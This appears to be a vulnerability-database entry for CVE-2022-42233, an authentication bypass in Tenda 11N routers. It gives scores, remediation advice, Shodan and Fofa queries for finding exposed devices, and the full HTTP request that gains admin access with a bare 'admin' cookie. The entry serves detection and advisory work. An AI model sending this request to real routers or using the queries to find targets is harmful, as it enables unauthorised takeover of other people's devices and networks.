🔙 목록으로 돌아가기

CVE-2022-42233: Tenda 11N - Authentication Bypass

TitleTenda 11N - Authentication Bypass
AuthorFor3stCo1d
SeverityCritical
ImpactUnauthenticated attackers can bypass authentication by setting an admin cookie to gain full administrative access to Tenda 11N routers, enabling complete device configuration changes and network compromise.
RemediationApply the latest firmware update provided by Tenda to fix the authentication bypass vulnerability (CVE-2022-42233).
CVSS Score9.8
EPSS Score0.84385
CVE IDCVE-2022-42233
CWE IDCWE-287
Shodan Queryhttp.title:"Tenda 11N"http.title:"tenda 11n"
Fofa Queryproduct=="Tenda-11N-Wireless-AP"product=="tenda-11n-wireless-ap"title="tenda 11n"
Tags cve cve2022 tenda auth-bypass router iot vuln

🔍 Vulnerability Description

Tenda 11N with firmware version V5.07.33_cn contains an authentication bypass vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

GET /index.asp HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Cookie: admin
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-42233.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-42233.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A